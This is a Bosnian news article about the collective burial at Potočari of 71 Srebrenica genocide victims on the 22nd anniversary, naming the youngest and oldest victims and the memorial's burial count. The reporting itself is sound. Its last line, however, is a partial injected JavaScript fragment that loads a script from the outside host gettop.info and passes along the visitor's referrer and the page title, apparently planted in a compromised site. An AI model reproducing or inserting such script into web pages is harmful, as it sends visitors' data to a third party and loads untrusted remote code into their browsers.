U Potočarima klanjana dženaza za 71 žrtvu srebreničkog genocida

Naša ekipa jučer je boravila u Potočarima, gdje smo prisustvovali ukopu 71 žrtve genocida u Srebrenici. Tuga i bol za izgubljenim najmilijim, ali i sreća jer konačno imaju gdje doći da prouče fatihu. Mnogobrojni članovi porodica, ali i građani koji su na ovaj način htjeli odati počast jučer su prisustvovali kolektivnoj dženazi koju je predvodio je reisu-l-ulema islamske zajednice u Bosni i Hercegovini Husein efendija Kavazović.

Preživjeli Srebreničani, članovi porodica ubijenih, prijatelji i komšije na rukama su prenijeli zelene tabute sa posmrtnim ostacima mezara gdje će žrtve genocida naći konačni smiraj poslije više od dvije decenije. Najmlađa žrtva koja je ukupana jučer u Potočarima je 15-godišnji Damir (Kemal) Suljić, čiji posmrtni ostaci su pronađeni u bratunačkoj masovnoj grobnici Blječeva, a najstarija Alija (Huso) Salihović, rođen 1923. Njegovi posmrti ostaci su pronađeni u masovnim grobnicama Zeleni Jadar i Pusmulići.

U mezarju Memorijalnog centra Srebrenica – Potočari do sada su smiraj pronašle 6.504 žrtve genocida, a traga se za još oko hiljadu. Sa žrtvama koje su jučer ukopane, broj onih koji su smiraj našli u mezarju Memorijalnog centra Srebrenica – Potočari iznosi 6.575. Fotogaleriju sa 22. godišnjice genocida u Srebrenici možete pogledati na našoj Facebook stranici.

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;